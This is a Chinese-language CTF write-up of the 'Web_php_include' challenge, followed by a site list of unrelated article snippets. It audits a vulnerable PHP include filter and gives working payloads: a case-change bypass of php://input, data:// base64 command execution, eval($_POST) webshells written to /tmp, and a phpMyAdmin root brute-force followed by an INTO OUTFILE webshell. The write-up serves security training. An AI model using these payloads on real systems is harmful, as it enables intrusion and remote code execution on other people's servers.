2024.12.10——攻防世界Web_php_include
知识点:代码审计 文件包含 伪协议
伪协议知识点补充:
在PHP中,伪协议(Pseudo Protocols)也被称为流包装器,这些伪协议以 php://开头,后面跟着一些参数,用于指定要执行的操作或需要访问的资源。 伪协议表明这些协议并不是一个真实的外部协议,例如http或ftp。PHP伪协议的出现是为了提供一个统一的、简洁的接口来处理不同的数据流。这些伪协议可以被看作是一种桥梁,它们允许开发者使用常规的文件操作函数来处理各种不同的数据流。
php://input:是PHP提供的一个伪协议,允许开发者访问POST请求的原始内容,对于POST请求数据,PHP提供了 $_POST 和 $FILES 超全局变量,在客户端发起POST请求时,PHP将自动处理POST提交的数据并将处理结果存放至 $_POST 和 $FILES 中。
一、解题思路
step 1 打开靶机审题
打开靶机得到一串代码,开始代码审计
<?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {$page=str_replace("php://", "", $page);
}
include($page);
?>
step 2 代码审计
-
show_source(__FILE__);show_source() 函数:将指定文件的内容以语法高亮的形式输出 -
strstr($page, "php://")strstr()函数strstr(字符串,你要搜索的内容,false)
括号里面有三个部分:
1.字符串:也就是上面的$page。例如:在url后面添加 /?page=123456,那么$page的内容就是123456。
2.你要搜索的内容:也就是题目中的php://。意思就是该函数会从$page的内容里去寻找php://,而这里是一个while语句,一旦查找到php://,那么就会执行大括号里面的语句。
例如:我的url是
http://61.147.171.105:53858/?page=php.php://input那么传入的$page的内容就是php://input,而前面的“php.”就会被丢弃。
3.false:我这里写false的原因是该参数默认是false。也就是一般情况只需要写前两个参数即可。false代表匹配到php://之后,会输出php://和之后的内容。而如果为true,则会输出“php.”,也就是php://前面的内容。
注:strstr函数对大小写敏感,也就是会区分大小写。
-
str_replace("php://", "", $page)str_replace()函数str_replace函数:这个函数的作用是将匹配到的php://全部替换为空。
例如:str_replace(“1”,“2”,“123”)会输出223。因为会将全部的1替换为2。(同样区分大小写)
str_replace("php://", "", $page) ,即会将 php:// 替换为 $page 中的值。
总之,程序过滤掉了page=参数传入php://
step 3 五个解法
解法一 使用php://input 伪协议&大小写绕过/原因:strstr函数区分大小写
php://input可用于执行php代码,使用post方式传递代码即可。这里再将php改为PHP
构建url为
/?page=PHP://input
使用hackbar或bp抓包,用post方式传递php代码。
<?php system('ls'); ?> 列出所有文件

fl4gisisish3r3.php 疑似flag,cat一下得到了真的flag
解法二 data://伪协议执行命令利用
既然过滤了php://的伪协议 我们可以使用其他协议来替代,这里使用data://伪协议
data://伪协议:php5.2.0起,数据流封装器开始有效,主要用于数据流的读取。如果传入的数据是PHP代码,就会执行代码
使用方法:
data://text/plain;base64,xxxx(base64编码后的数据)
<?php system("dir")?> base64编码后为 PD9waHAgc3lzdGVtKCJkaXIiKT8+
http://61.147.171.105:64764/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJkaXIiKT8%2b
(注意编码后的+号要URL编码)
<?php system("cat fl4gisisish3r3.php")?> base64编码后使用
http://61.147.171.105:64764/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQgZmw0Z2lzaXNpc2gzcjMucGhwIik/Pg==
查看源码得到flag

解法三 data://伪协议转木马
<?php eval($_POST[x]); ?> base64加密后拼接
http://61.147.171.105:64764/?page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1RbeGlhb2h1YV0pOyA/Pg==
菜刀连接即可:
解法四 抓包后再最下面添加一段代码+蚁剑
代码如下:
<?PHP fputs(fopen('/tmp/shell.php','w'),'<?php @eval($_POST[x])?>');?>

注意点:这里一句话木马[]里没有单引号&蚁剑链接先测试链接
Tips:linux默认tmp是可写目录,所以尝试一句话,然后蚁剑链接,即可看到文件
解法四 数据库写入一句话木马(这里没弄明白在哪里写入一句话木马,望大佬指条明路!)
dirsearch扫描获得phpmyadmin文件,怪怪的,传参进去看看情况,得到如下界面

抓包爆破用户名和密码 得到用户名为root,密码为空
进入数据库执行这条命令查看secure_file_priv是否为空,为空则可以写数据
SHOW VARIABLES LIKE "secure_file_priv" 显示为空
然后写入一句话马,用蚁剑连接
SELECT "<?php eval(@$_POST['xiaohua']); ?>"
INTO OUTFILE '/tmp/test1.php'
注:secure_file_priv 为系统变量,如果是null,即没设置允许操作的目录,所以没法导出到文件
解法五 通过hello参数回显(新方法,但这里模棱两可,这里也需要大佬指路)
payload如下(flag文件名由上面方法可以得到)
http://61.147.171.105:64764/?page=http://127.0.0.1?hello=<?show_source('fl4gisisish3r3.php');?>
大概理解一下:
首先使page参数为本页代码,绕过判断,会执行include文件包含本页代码,这时传入的hello参数会被视为php代码执行
相关文章:
2024.12.10——攻防世界Web_php_include
知识点:代码审计 文件包含 伪协议 伪协议知识点补充: 在PHP中,伪协议(Pseudo Protocols)也被称为流包装器,这些伪协议以 php://开头,后面跟着一些参数,用于指定要执行的操作或需要…...
【机器学习算法】——数据可视化
1. 饼图:显示基本比例关系 import matplotlib.pyplot as pltplt.rcParams[font.sans-serif] [SimHei] plt.rcParams[axes.unicode_minus] False# ——————————————————————————————————————————————————————…...
如何在 Android 项目中实现跨库传值
背景介绍 在一个复杂的 Android 项目中,我们通常会有多个库(lib),而主应用程序(app)依赖所有这些库。目前遇到的问题是,在这些库中,libAd 需要获取 libVip 的 VIP 等级状态…...
JavaCV之FFmpegFrameFilter视频转灰度
1、代码 package com.example.demo.ffpemg;import lombok.SneakyThrows; import org.bytedeco.javacv.*;public class FFmpegFrameFilterVideoExample {SneakyThrowspublic static void main(String[] args) {// 输入视频文件路径String inputVideoPath "f:/2222.mp4&qu…...
Redis:基于PubSub(发布/订阅)、Stream流实现消息队列
Redis - PubSub、Stream流 文章目录 Redis - PubSub、Stream流1.基于List的消息队列2.基于PubSub的消息队列3.基于Stream的消息队列1.Redis Streams简介2.Redis Streams基本命令1.XADD 添加消息到末尾2.XLEN 获取消息长度3.XREAD 读取消息 (单消费模式)4…...
C#飞行棋(新手简洁版)
我们要在主函数的顶部写一些全局静态字段 确保能在后续的静态方法中能够获取到这些值和修改 static int[] Maps new int[100];static string[] PlayerName new string[2];static int[] PlayerScore new int[2];static bool[] Flags new bool[2] {true,true }; static int[]…...
【OpenCV】图像转换
理论 傅立叶变换用于分析各种滤波器的频率特性。对于图像,使用 2D离散傅里叶变换(DFT) 查找频域。快速算法称为 快速傅立叶变换(FFT) 用于计算DFT。 Numpy中的傅立叶变换 首先,我们将看到如何使用Numpy查…...
力扣 重排链表-143
重排链表-143 /*** Definition for singly-linked list.* struct ListNode {* int val;* ListNode *next;* ListNode() : val(0), next(nullptr) {}* ListNode(int x) : val(x), next(nullptr) {}* ListNode(int x, ListNode *next) : val(x), next(next)…...
【Kubernetes理论篇】容器集群管理系统Kubernetes(K8S)
Kubernetes集群部署基本管理实战 这么好的机会,还在等什么! 01、Kubernetes 概述 K8S是什么 K8S 的全称为 Kubernetes (K12345678S),PS:“嘛,写全称也太累了吧,写”。不如整个缩写 K8s 作为缩写的结果…...
Kubernetes 常用操作大全:全面掌握 K8s 基础与进阶命令
Kubernetes(简称 K8s)作为一种开源的容器编排工具,已经成为现代分布式系统中的标准。它的强大之处在于能够自动化应用程序的部署、扩展和管理。在使用 Kubernetes 的过程中,熟悉常用操作对于高效地管理集群资源至关重要。本文将详…...
爬虫基础之Web网页基础
网页的组成 网页可以分为三大部分–HTML、CSS 和 JavaScript。如果把网页比作一个人,那么 HTML 相当于骨架、JavaScript 相当于肌肉、CSS 相当于皮肤,这三者结合起来才能形成一个完善的网页。下面我们分别介绍一下这三部分的功能。 HTML HTML(Hypertext…...
k8s, deployment
控制循环(control loop) for {实际状态 : 获取集群中对象X的实际状态(Actual State)期望状态 : 获取集群中对象X的期望状态(Desired State)if 实际状态 期望状态{什么都不做} else {执行编排动作…...
使用ensp搭建OSPF+BGP和静态路由,底层PC使用dhcp,实现PC互通
1.4种方式,实现PC2可以互通底层的所有设备 OSPF:OSPF是一种用于互联网协议网络的链路状态路由协议 BGP:是一种用于互联网上进行路由和可达性信息传递的外部网关协议(EGP) 静态路由: 静态路由是一种路由方…...
TÜLU 3: Pushing Frontiers in Open Language Model Post-Training
基本信息 📝 原文链接: https://arxiv.org/abs/2411.15124👥 作者: Nathan Lambert, Jacob Morrison, Valentina Pyatkin, Shengyi Huang, Hamish Ivison, Faeze Brahman, Lester James V. Miranda, Alisa Liu, Nouha Dziri, Shane Lyu, Yuling Gu, Sau…...
深入解读 MySQL EXPLAIN 与索引优化实践
MySQL 是当今最流行的关系型数据库之一,为了提升查询性能,合理使用 EXPLAIN 工具和优化索引显得尤为重要。本文将结合实际示例,探讨如何利用 EXPLAIN 分析查询执行计划,并分享索引优化的最佳实践。 一、EXPLAIN 工具简介 EXPLAIN …...
Flume——进阶(agent特性+三种结构:串联,多路复用,聚合)
目录 agent特性ChannelSelector描述: SinkProcessor描述: 串联架构结构图解定义与描述配置示例Flume1(监测端node1)Flume3(接收端node3)启动方式 复制和多路复用结构图解定义描述配置示例node1node2node3启…...
ragflow连ollama时出现的Bug
ragflow和ollama连接后,已经添加了两个模型但是ragflow仍然一直warn:Please add both embedding model and LLM in Settings > Model providers firstly.这里可能是我一开始拉取的镜像容器太小,容不下当前添加的模型,导…...
基于centos7.7编译Redis6.0
背景: OS:CentOs 7.7 Redis: 6.0.6 编译构建报错如下: In file included from server.c:30:0: server.h:1044:5: error: expected specifier-qualifier-list before ‘_Atomic’_Atomic unsigned int lruclock; /* Clock for LRU eviction …...
uni-app项目无法在Android Studio模拟器上运行
目录 1 问题描述2 尝试解决3 引发原因4 解决方法4.1 换用 MuMu 模拟器 5 结语 1 问题描述 在使用 uni-app 开发 Pad 端 App 时,初始化项目后打算先运行一下确保初始化正常。打开 Android Studio 模拟器后,然后在 HbuilderX 中选择使用 App 标准基座 运…...
第一部分:Linux系统(基础及命令)
Linux操作系统的实操性非常强,纯操作,不适用于日常的办公使用 1.初始Linux 1.1 操作系统概述 1.1.1 了解OS的作用 OS:是计算机软件的一种,主要负责:作为用户和计算机硬件之间的桥梁,调度和管理计算机硬…...
06-大模型本地化部署:OllamavLLMLMDeploy+ModelScope
课前知识 服务器租用 本次部署大模型,笔记本的性能可能是不够的 去租用服务器https://www.autodl.com/home // https://gpushare.com/store 要求:liunxGPU>12G 五块钱就够用了 链接使用服务器 VS code 安装连接插件 安装后出现这个 新建连接 拿去ssh…...
LA04-Abaqus嵌合体退火仿真案例教程:完全热力耦合分析的实践与解析
LA04-Abaqus嵌合体退火热力耦合仿真案例教程 在Abaqus中创建304钢-铜缝-304钢焊接的2D平板模型,赋予密度、弹性参数、热导率、比热容和线膨胀系数后,给定梯度变化温度载荷曲线,对装配体进行退火模拟的完全热力耦合分析,输出温度场…...
假如后端一次性返回10w条数据,前端如何应对
假如后端一次性返回10w条数据首先设计不合理浏览器能否处理10w条数据1,JS没问题2,渲染到DOM会非常卡顿方案一:自定义中间层(1)自定义nodejs中间层,获取并拆分这10w条数据(2)前端对接…...
异构算力平台推荐:2026年谁在重新定义AI算力?
当下,大模型训练与推理进入规模化运行期,算力已成为基础设施的常量。公开报告显示,2024 年中国智能算力规模达 725.3 EFLOPS,同比增长 74.1%。然而,面对多元化的业务场景与复杂的硬件生态,如何高效地分配与…...
Qwen2多语言开发避坑手册:30种语言支持下的API调用最佳实践
Qwen2多语言开发避坑手册:30种语言支持下的API调用最佳实践 跨国业务开发者在处理多语言场景时,常常面临字符编码混乱、语言检测不准、API响应不稳定等痛点。本文将深入解析Qwen2多语言API的实战技巧,覆盖从基础调用到高级优化的全流程&#…...
stm32写字机器人资料 主控stm32f103c8t6 包含程序,原理图,pcb
stm32写字机器人资料 主控stm32f103c8t6 包含程序,原理图,pcb,机械结构最近折腾了个基于STM32的写字机器人,从硬件画板到代码调试踩了不少坑,这里把核心模块拆开说说。主控用的是性价比极高的STM32F103C8T6,…...
AIVideo高级应用:使用PID算法优化视频生成流程
AIVideo高级应用:使用PID算法优化视频生成流程 1. 引言 视频创作者们经常面临一个两难选择:想要高质量的视频效果,就得承受漫长的生成时间和巨大的计算资源消耗;想要快速出片,又不得不接受画质和细节的妥协。传统的视…...
最新微信在线AI客服系统源码独家支持多媒体+人工客服转接
温馨提示:文末有资源获取方式近日,一款基于PHP原生开发的微信AI智能在线客服系统解决方案正式亮相,深度集成企业微信生态,为企业提供724小时智能值守服务。该系统突破传统文本客服的单一模式,独家支持多媒体交互与人工…...
世嘉MD完全档案中文版PDF
核心内容分区MD 本体(1988–1996):硬件迭代(MD1/MD2/MD3)、手柄、卡带;全游戏封面 截图 基础信息Mega-CD(1991–1996)、Super 32X(1994–1995)扩展外设与专…...
MCP集成效率提升300%:基于VS Code 1.89+最新Extension API重构的轻量接入方案(仅需12行核心代码)
第一章:MCP集成效率提升300%:基于VS Code 1.89最新Extension API重构的轻量接入方案(仅需12行核心代码)VS Code 1.89 引入了全新的 vscode.mcp 模块与声明式注册机制,彻底替代了传统事件监听手动协议解析的冗余模式。开…...
